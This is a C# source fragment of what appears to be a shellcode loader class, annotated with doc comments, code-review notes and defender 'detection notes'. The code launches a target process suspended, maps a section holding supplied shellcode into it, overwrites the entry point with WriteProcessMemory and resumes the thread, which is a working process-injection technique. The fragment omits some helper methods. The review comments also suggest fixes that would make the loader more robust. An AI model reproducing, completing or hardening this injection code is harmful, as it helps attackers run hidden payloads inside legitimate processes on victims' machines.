/// <summary>
/// Creates a new process from <paramref name="path"/> with creation flag 4u, which matches the
/// Win32 CREATE_SUSPENDED value (0x00000004), so the primary thread does not run until something
/// later calls ResumeThread. The command line is passed as <c>lpCommandLine</c> with a null
/// <c>lpApplicationName</c>; no security attributes, environment or working directory are supplied.
/// </summary>
/// <param name="path">Command line handed to CreateProcess; not validated here (a null or empty value reaches the native call unchanged).</param>
/// <returns>The PROCESS_INFORMATION filled in by CreateProcess. The caller owns <c>hProcess</c> and <c>hThread</c> and must close them.</returns>
/// <exception cref="SystemException">Thrown when CreateProcess returns false. The Win32 error code is not captured; a reviewer would prefer a <c>Win32Exception</c> built from GetLastError so the failure is diagnosable.</exception>
/// <remarks>
/// Detection note: a process created suspended and later resumed after remote memory writes is a
/// well-known telemetry pattern; the suspended state is the observable marker on this line.
/// </remarks>
public Loader.PROCESS_INFORMATION StartProcess(string path) { Loader.STARTUPINFO sTARTUPINFO = default(Loader.STARTUPINFO); Loader.PROCESS_INFORMATION result = default(Loader.PROCESS_INFORMATION); uint dwCreateFlags = 4u; if (!Loader.CreateProcess((IntPtr)0, path, (IntPtr)0, (IntPtr)0, false, dwCreateFlags, (IntPtr)0, (IntPtr)0, ref sTARTUPINFO, out result)) { throw new SystemException("[x] Failed to create process!"); } return(result); }
/// <summary>
/// Orchestrates the full sequence: start <paramref name="targetProcess"/> (suspended, see StartProcess),
/// locate its entry point via FindEntry, create a section sized to <paramref name="shellcode"/>,
/// map it locally, copy the bytes in, then MapAndStart the remote side and close both handles.
/// </summary>
/// <param name="targetProcess">Command line forwarded to StartProcess.</param>
/// <param name="shellcode">Bytes copied into the section; <c>shellcode.Length</c> is read before any null check, so a null argument fails with a NullReferenceException after the process has already been created.</param>
/// <exception cref="SystemException">Thrown here when CreateSection returns false; also propagated from StartProcess and MapAndStart.</exception>
/// <remarks>
/// NOTE(review): CloseHandle for <c>hThread</c> and <c>hProcess</c> runs only on the success path.
/// There is no try/finally, so if FindEntry, CreateSection, SetLocalSection, CopyShellcode or
/// MapAndStart throws, both handles leak and the suspended child is left behind. Wrapping the body
/// after StartProcess in try/finally that closes the handles (and, on failure, terminates the
/// orphaned child) would be the minimal fix. FindEntry, CreateSection, SetLocalSection and
/// CopyShellcode are defined elsewhere in the class; their contracts are not visible here.
/// </remarks>
public void Load(string targetProcess, byte[] shellcode) { Loader.PROCESS_INFORMATION pROCESS_INFORMATION = this.StartProcess(targetProcess); this.FindEntry(pROCESS_INFORMATION.hProcess); if (!this.CreateSection((uint)shellcode.Length)) { throw new SystemException("[x] Failed to create new section!"); } this.SetLocalSection((uint)shellcode.Length); this.CopyShellcode(shellcode); this.MapAndStart(pROCESS_INFORMATION); Loader.CloseHandle(pROCESS_INFORMATION.hThread); Loader.CloseHandle(pROCESS_INFORMATION.hProcess); }
/// <summary>
/// Maps the previously created section into <c>pInfo.hProcess</c>, writes a patch produced by
/// BuildEntryPatch at <c>pEntry_</c> with WriteProcessMemory, reads 1024 bytes back from the same
/// address, and finally resumes the suspended primary thread.
/// </summary>
/// <param name="pInfo">Process and thread handles returned by StartProcess; not closed here.</param>
/// <exception cref="SystemException">
/// Thrown when MapSection yields a zero address or size, when WriteProcessMemory fails or reports
/// zero bytes written (the message appends GetLastError), when ReadProcessMemory fails, or when
/// ResumeThread returns 0xFFFFFFFF (the documented failure value, (DWORD)-1).
/// </exception>
/// <remarks>
/// <para>The 64u passed to MapSection is presumably a page-protection constant (0x40 is
/// PAGE_EXECUTE_READWRITE in Win32), but MapSection is a project method and its parameter meaning
/// is not visible here — confirm against its definition.</para>
/// <para>The try/finally frees the unmanaged patch buffer (<c>keyValuePair2.Value</c>) whether or
/// not the write succeeds; the address is only freed when non-zero.</para>
/// <para>NOTE(review): the ReadProcessMemory result is never inspected — <c>lpBuffer</c> is
/// allocated at 4096 bytes, 1024 are requested, and neither the contents nor <c>intPtr</c> are used
/// afterwards. It looks like a leftover debug verification; either compare the read-back bytes
/// against the patch or drop the call. Its error message "Failed!" is the only one without the
/// "[x]" prefix and carries no error code.</para>
/// <para>Detection note: the visible sequence — remote section mapping, WriteProcessMemory at the
/// entry point of a suspended process, then ResumeThread — is the classic marker defenders key on;
/// the fields <c>remotemap_</c>/<c>remotesize_</c> record where the mapping landed.</para>
/// </remarks>
public void MapAndStart(Loader.PROCESS_INFORMATION pInfo) { KeyValuePair <IntPtr, IntPtr> keyValuePair = this.MapSection(pInfo.hProcess, 64u, IntPtr.Zero); if (keyValuePair.Key == (IntPtr)0 || keyValuePair.Value == (IntPtr)0) { throw new SystemException("[x] Failed to map section into target process!"); } this.remotemap_ = keyValuePair.Key; this.remotesize_ = keyValuePair.Value; KeyValuePair <int, IntPtr> keyValuePair2 = this.BuildEntryPatch(keyValuePair.Key); try { IntPtr nSize = (IntPtr)keyValuePair2.Key; IntPtr value = 0; if (!Loader.WriteProcessMemory(pInfo.hProcess, this.pEntry_, keyValuePair2.Value, nSize, out value) || value == IntPtr.Zero) { throw new SystemException("[x] Failed to write patch to start location! " + Loader.GetLastError().ToString()); } } finally { if (keyValuePair2.Value != IntPtr.Zero) { Marshal.FreeHGlobal(keyValuePair2.Value); } } byte[] lpBuffer = new byte[4096]; IntPtr intPtr = 0; if (!Loader.ReadProcessMemory(pInfo.hProcess, this.pEntry_, lpBuffer, 1024, out intPtr)) { throw new SystemException("Failed!"); } if (Loader.ResumeThread(pInfo.hThread) == 4294967295u) { throw new SystemException("[x] Failed to restart thread!"); } }
/// <summary>
/// P/Invoke signature for Win32 CreateProcess. The <c>[DllImport]</c> attribute that binds this
/// declaration to kernel32 is not on this line; it is assumed to precede it outside this view.
/// </summary>
/// <param name="lpApplicationName">Module name; callers here pass <c>(IntPtr)0</c>, so the command line is parsed for the executable instead.</param>
/// <param name="lpCommandLine">Command line string, marshalled by the runtime.</param>
/// <param name="lpProcAttribs">Process SECURITY_ATTRIBUTES pointer, or zero.</param>
/// <param name="lpThreadAttribs">Thread SECURITY_ATTRIBUTES pointer, or zero.</param>
/// <param name="bInheritHandles">Whether inheritable handles are passed to the child; marshals as a 4-byte Win32 BOOL by default.</param>
/// <param name="dwCreateFlags">Process creation flags (StartProcess passes 4u, CREATE_SUSPENDED).</param>
/// <param name="lpEnvironment">Environment block pointer, or zero to inherit.</param>
/// <param name="lpCurrentDir">Working directory pointer, or zero to inherit.</param>
/// <param name="lpStartinfo">STARTUPINFO passed by reference; <c>[In]</c> marks it input-only.</param>
/// <param name="lpProcInformation">Receives process/thread handles and ids; the caller must close both handles.</param>
/// <returns>true on success; on false the caller should read GetLastError (ideally with <c>SetLastError = true</c> on the DllImport so the value is preserved).</returns>
private static extern bool CreateProcess(IntPtr lpApplicationName, string lpCommandLine, IntPtr lpProcAttribs, IntPtr lpThreadAttribs, bool bInheritHandles, uint dwCreateFlags, IntPtr lpEnvironment, IntPtr lpCurrentDir, [In] ref Loader.STARTUPINFO lpStartinfo, out Loader.PROCESS_INFORMATION lpProcInformation);